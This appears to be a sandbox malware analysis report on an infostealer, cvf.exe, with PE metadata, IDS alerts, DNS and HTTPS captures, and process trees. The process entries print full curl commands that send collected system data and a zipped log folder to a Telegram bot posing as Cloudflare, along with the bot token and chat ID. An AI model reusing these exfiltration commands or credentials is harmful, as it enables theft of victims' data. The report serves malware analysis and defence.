.text | 0x1000 | 0x387a4 | 0x38800 | d91741c6310ac212d5fd5e72ee2e0c78 | False | 0.5208578194137168 | data | 6.57298549546635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x3a000 | 0xc6a0 | 0xc800 | 733fe21a7179482d9d565fc0d83dabce | False | 0.431015625 | data | 4.966999938216593 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x47000 | 0x2160 | 0x1400 | 8bc01682a84ebcb3e42c3638270ee7a4 | False | 0.19453125 | DOS executable (block device driver) | 3.322348124379405 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4a000 | 0x1e0 | 0x200 | f1a34722f46fc93b4d50c6f08dc7679b | False | 0.53125 | data | 4.7137725829467545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x4b000 | 0x2650 | 0x2800 | 5318f9ac373c0e8d7d1bd21f9ceeb910 | False | 0.70771484375 | data | 6.473938433272911 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x4a060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | GetModuleFileNameA, FindFirstFileA, GetModuleFileNameW, FindNextFileA, FindClose, WaitForSingleObject, CopyFileA, GetLastError, GetFileAttributesA, CloseHandle, GetProcAddress, CreateProcessW, GetModuleHandleW, GetConsoleWindow, CreateDirectoryA, WriteConsoleW, HeapSize, SetStdHandle, GetProcessHeap, LocalFree, FormatMessageA, GetLocaleInfoEx, CreateFileW, FindFirstFileW, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, AreFileApisANSI, GetFileInformationByHandleEx, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, GetCPInfo, GetStringTypeW, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, RaiseException, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, DuplicateHandle, ExitProcess, GetModuleHandleExW, GetStdHandle, WriteFile, GetCommandLineA, GetCommandLineW, GetFileSizeEx, SetFilePointerEx, GetFileType, HeapAlloc, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, DeleteFileW, HeapReAlloc, GetExitCodeProcess, CreatePipe, ReadFile, ReadConsoleW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetEndOfFile
USER32.dll | ShowWindow
SHELL32.dll | SHGetFolderPathA
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-12T20:14:58.605223+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49723 | 149.154.167.220 | 443 | TCP
2025-03-12T20:15:02.180165+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49726 | 149.154.167.220 | 443 | TCP
2025-03-12T20:15:04.974956+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49731 | 149.154.167.220 | 443 | TCP
2025-03-12T20:15:08.056433+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49735 | 149.154.167.220 | 443 | TCP
2025-03-12T20:15:21.605870+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.4 | 49742 | 149.154.167.220 | 443 | TCP
2025-03-12T20:15:24.769160+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.4 | 49745 | 149.154.167.220 | 443 | TCP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 12, 2025 20:14:56.548433065 CET | 192.168.2.4 | 1.1.1.1 | 0x4472 | Standard query (0) | resolver1.opendns.com | A (IP address) | IN (0x0001) | false
Mar 12, 2025 20:14:56.558608055 CET | 192.168.2.4 | 208.67.222.222 | 0x1 | Standard query (0) | 222.222.67.208.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Mar 12, 2025 20:14:56.567537069 CET | 192.168.2.4 | 208.67.222.222 | 0x2 | Standard query (0) | myip.opendns.com | A (IP address) | IN (0x0001) | false
Mar 12, 2025 20:14:56.578062057 CET | 192.168.2.4 | 208.67.222.222 | 0x3 | Standard query (0) | myip.opendns.com | 28 | IN (0x0001) | false
Mar 12, 2025 20:14:56.728264093 CET | 192.168.2.4 | 1.1.1.1 | 0xf838 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Mar 12, 2025 20:15:02.968705893 CET | 192.168.2.4 | 208.67.222.222 | 0x1 | Standard query (0) | 222.222.67.208.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Mar 12, 2025 20:15:02.977395058 CET | 192.168.2.4 | 208.67.222.222 | 0x2 | Standard query (0) | myip.opendns.com | A (IP address) | IN (0x0001) | false
Mar 12, 2025 20:15:02.988343000 CET | 192.168.2.4 | 208.67.222.222 | 0x3 | Standard query (0) | myip.opendns.com | 28 | IN (0x0001) | false
Mar 12, 2025 20:15:19.597353935 CET | 192.168.2.4 | 1.1.1.1 | 0x78bd | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 12, 2025 20:14:56.556047916 CET | 1.1.1.1 | 192.168.2.4 | 0x4472 | No error (0) | resolver1.opendns.com |  | 208.67.222.222 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 20:14:56.565583944 CET | 208.67.222.222 | 192.168.2.4 | 0x1 | No error (0) | 222.222.67.208.in-addr.arpa |  |  | PTR (Pointer record) | IN (0x0001) | false
Mar 12, 2025 20:14:56.574563980 CET | 208.67.222.222 | 192.168.2.4 | 0x2 | No error (0) | myip.opendns.com |  | 54.38.153.202 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 20:14:56.736502886 CET | 1.1.1.1 | 192.168.2.4 | 0xf838 | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 20:15:02.975476980 CET | 208.67.222.222 | 192.168.2.4 | 0x1 | No error (0) | 222.222.67.208.in-addr.arpa |  |  | PTR (Pointer record) | IN (0x0001) | false
Mar 12, 2025 20:15:02.984086990 CET | 208.67.222.222 | 192.168.2.4 | 0x2 | No error (0) | myip.opendns.com |  | 54.38.153.202 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 20:15:19.604445934 CET | 1.1.1.1 | 192.168.2.4 | 0x78bd | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                            • api.telegram.org
                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.4 | 49723 | 149.154.167.220 | 443 | 7864 | C:\Windows\SysWOW64\curl.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2025-03-12 19:14:58 UTC | 195 | OUT | POST /bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage HTTP/1.1
                                                            Host: api.telegram.org
                                                            User-Agent: curl/7.83.1
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 399
                                                            2025-03-12 19:14:58 UTC | 399 | OUT | Data Ascii: {"chat_id": "-4798834305", "parse_mode": "HTML", "text": " Stolen Contents \n\n IP: Address: 208.67.222.222\nAddress: 54.38.153.202\n\n Wallet Extensions (0)\n\n Software Wallets (0)\n\n Cookies & Saved Passwords (0)\n N
                                                            2025-03-12 19:14:59 UTC | 388 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0
                                                            Date: Wed, 12 Mar 2025 19:14:59 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 823
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2025-03-12 19:14:59 UTC | 823 | IN | Data Ascii: {"ok":true,"result":{"message_id":15091,"from":{"id":8194646631,"is_bot":true,"first_name":"Fake Cloudflare Bot \ud83e\ude9d","username":"FakeCloudflareBot"},"chat":{"id":-4798834305,"title":"cloudflare logs all","type":"group","all_members_are_administra


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            1 | 192.168.2.4 | 49726 | 149.154.167.220 | 443 | 7940 | C:\Windows\SysWOW64\curl.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2025-03-12 19:15:02 UTC | 195 | OUT | POST /bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage HTTP/1.1
                                                            Host: api.telegram.org
                                                            User-Agent: curl/7.83.1
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 399
                                                            2025-03-12 19:15:02 UTC | 399 | OUT | Data Ascii: {"chat_id": "-4798834305", "parse_mode": "HTML", "text": " Stolen Contents \n\n IP: Address: 208.67.222.222\nAddress: 54.38.153.202\n\n Wallet Extensions (0)\n\n Software Wallets (0)\n\n Cookies & Saved Passwords (0)\n N
                                                            2025-03-12 19:15:02 UTC | 388 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0
                                                            Date: Wed, 12 Mar 2025 19:15:02 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 823
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2025-03-12 19:15:02 UTC | 823 | IN | Data Ascii: {"ok":true,"result":{"message_id":15093,"from":{"id":8194646631,"is_bot":true,"first_name":"Fake Cloudflare Bot \ud83e\ude9d","username":"FakeCloudflareBot"},"chat":{"id":-4798834305,"title":"cloudflare logs all","type":"group","all_members_are_administra


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            2 | 192.168.2.4 | 49731 | 149.154.167.220 | 443 | 8176 | C:\Windows\SysWOW64\curl.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2025-03-12 19:15:04 UTC | 195 | OUT | POST /bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage HTTP/1.1
                                                            Host: api.telegram.org
                                                            User-Agent: curl/7.83.1
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 399
                                                            2025-03-12 19:15:04 UTC | 399 | OUT | Data Ascii: {"chat_id": "-4798834305", "parse_mode": "HTML", "text": " Stolen Contents \n\n IP: Address: 208.67.222.222\nAddress: 54.38.153.202\n\n Wallet Extensions (0)\n\n Software Wallets (0)\n\n Cookies & Saved Passwords (0)\n N
                                                            2025-03-12 19:15:05 UTC | 388 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0
                                                            Date: Wed, 12 Mar 2025 19:15:05 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 823
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2025-03-12 19:15:05 UTC | 823 | IN | Data Ascii: {"ok":true,"result":{"message_id":15094,"from":{"id":8194646631,"is_bot":true,"first_name":"Fake Cloudflare Bot \ud83e\ude9d","username":"FakeCloudflareBot"},"chat":{"id":-4798834305,"title":"cloudflare logs all","type":"group","all_members_are_administra


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            3 | 192.168.2.4 | 49735 | 149.154.167.220 | 443 | 1832 | C:\Windows\SysWOW64\curl.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2025-03-12 19:15:08 UTC | 195 | OUT | POST /bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage HTTP/1.1
                                                            Host: api.telegram.org
                                                            User-Agent: curl/7.83.1
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 388
                                                            2025-03-12 19:15:08 UTC | 388 | OUT | Data Ascii: {"chat_id": "", "parse_mode": "HTML", "text": " Stolen Contents \n\n IP: Address: 208.67.222.222\nAddress: 54.38.153.202\n\n Wallet Extensions (0)\n\n Software Wallets (0)\n\n Cookies & Saved Passwords (0)\n None (N/A)\n
                                                            2025-03-12 19:15:08 UTC | 346 | IN | HTTP/1.1 400 Bad Request
                                                            Server: nginx/1.18.0
                                                            Date: Wed, 12 Mar 2025 19:15:08 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 75
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2025-03-12 19:15:08 UTC | 75 | IN | Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: chat_id is empty"}


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            4 | 192.168.2.4 | 49742 | 149.154.167.220 | 443 | 6864 | C:\Windows\SysWOW64\curl.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2025-03-12 19:15:21 UTC | 250 | OUT | POST /bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument HTTP/1.1
                                                            Host: api.telegram.org
                                                            User-Agent: curl/7.83.1
                                                            Accept: */*
                                                            Content-Length: 594
                                                            Content-Type: multipart/form-data; boundary=------------------------f44e17bf4b95ceb9
                                                            2025-03-12 19:15:21 UTC | 594 | OUT | Data Ascii: --------------------------f44e17bf4b95ceb9Content-Disposition: form-data; name="chat_id"-4798834305--------------------------f44e17bf4b95ceb9Content-Disposition: form-data; name="document"; filename="log.zip"Content-Type: application/octet-str
                                                            2025-03-12 19:15:22 UTC | 388 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0
                                                            Date: Wed, 12 Mar 2025 19:15:22 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 508
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2025-03-12 19:15:22 UTC | 508 | IN | Data Ascii: {"ok":true,"result":{"message_id":15095,"from":{"id":8194646631,"is_bot":true,"first_name":"Fake Cloudflare Bot \ud83e\ude9d","username":"FakeCloudflareBot"},"chat":{"id":-4798834305,"title":"cloudflare logs all","type":"group","all_members_are_administra


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            5 | 192.168.2.4 | 49745 | 149.154.167.220 | 443 | 3876 | C:\Windows\SysWOW64\curl.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2025-03-12 19:15:24 UTC | 250 | OUT | POST /bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument HTTP/1.1
                                                            Host: api.telegram.org
                                                            User-Agent: curl/7.83.1
                                                            Accept: */*
                                                            Content-Length: 583
                                                            Content-Type: multipart/form-data; boundary=------------------------2079f6b0343d5674
                                                            2025-03-12 19:15:24 UTC | 583 | OUT | Data Ascii: --------------------------2079f6b0343d5674Content-Disposition: form-data; name="chat_id"--------------------------2079f6b0343d5674Content-Disposition: form-data; name="document"; filename="log.zip"Content-Type: application/octet-streamPK
                                                            2025-03-12 19:15:25 UTC | 346 | IN | HTTP/1.1 400 Bad Request
                                                            Server: nginx/1.18.0
                                                            Date: Wed, 12 Mar 2025 19:15:25 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 75
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2025-03-12 19:15:25 UTC | 75 | IN | Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: chat_id is empty"}



                                                            Target ID:0
                                                            Start time:15:14:55
                                                            Start date:12/03/2025
                                                            Path:C:\Users\user\Desktop\cvf.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\cvf.exe"
                                                            Imagebase:0xbb0000
                                                            File size:299'520 bytes
                                                            MD5 hash:724D9557F66B00F2D74846E3E29434E6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:15:14:55
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff62fc20000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:15:14:55
                                                            Start date:12/03/2025
                                                            Path:C:\Users\user\Desktop\cvf.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cvf.exe
                                                            Imagebase:0xbb0000
                                                            File size:299'520 bytes
                                                            MD5 hash:724D9557F66B00F2D74846E3E29434E6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:15:14:55
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.com
                                                            Imagebase:0xc70000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:15:14:55
Start date: 12/03/2025
Path: C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit): true
Commandline: nslookup myip.opendns.com resolver1.opendns.com
Imagebase: 0x3e0000
File size: 77'824 bytes
MD5 hash: 9D2EB13476B126CB61B12CDD03C7DCA6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 5
Start time: 15:14:55
Start date: 12/03/2025
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr Address
Imagebase: 0x170000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 15:14:55
Start date: 12/03/2025
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr /V resolver1.opendns.com
Imagebase: 0x170000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 15:14:55
Start date: 12/03/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Imagebase: 0xc70000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 15:14:55
Start date: 12/03/2025
Path: C:\Windows\SysWOW64\curl.exe
Wow64 process (32bit): true
Commandline: curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Imagebase: 0x7f0000
File size: 470'528 bytes
MD5 hash: 44E5BAEEE864F1E9EDBE3986246AB37A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 9
Start time: 15:14:58
Start date: 12/03/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Imagebase: 0xc70000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 15:14:58
Start date: 12/03/2025
Path: C:\Windows\SysWOW64\curl.exe
Wow64 process (32bit): true
Commandline: curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Imagebase: 0x7f0000
File size: 470'528 bytes
MD5 hash: 44E5BAEEE864F1E9EDBE3986246AB37A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 12
Start time: 15:15:01
Start date: 12/03/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.com
Imagebase: 0xc70000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 15:15:01
Start date: 12/03/2025
Path: C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit): true
Commandline: nslookup myip.opendns.com resolver1.opendns.com
Imagebase: 0x3e0000
File size: 77'824 bytes
MD5 hash: 9D2EB13476B126CB61B12CDD03C7DCA6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 14
Start time: 15:15:01
Start date: 12/03/2025
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr Address
Imagebase: 0x170000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 15
Start time: 15:15:01
Start date: 12/03/2025
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr /V resolver1.opendns.com
Imagebase: 0x170000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 16
Start time: 15:15:01
Start date: 12/03/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Imagebase: 0xc70000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 15:15:02
Start date: 12/03/2025
Path: C:\Windows\SysWOW64\curl.exe
Wow64 process (32bit): true
Commandline: curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Imagebase: 0x7f0000
File size: 470'528 bytes
MD5 hash: 44E5BAEEE864F1E9EDBE3986246AB37A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 15:15:04
Start date: 12/03/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Imagebase: 0xc70000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 19
Start time: 15:15:04
Start date: 12/03/2025
Path: C:\Windows\SysWOW64\curl.exe
Wow64 process (32bit): true
Commandline: curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Imagebase: 0x7f0000
File size: 470'528 bytes
MD5 hash: 44E5BAEEE864F1E9EDBE3986246AB37A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 25
Start time: 15:15:07
Start date: 12/03/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force"
Imagebase: 0xc70000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 15:15:08
Start date: 12/03/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force"
Imagebase: 0x230000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 29
Start time: 15:15:18
Start date: 12/03/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=-4798834305" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"
Imagebase: 0xc70000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true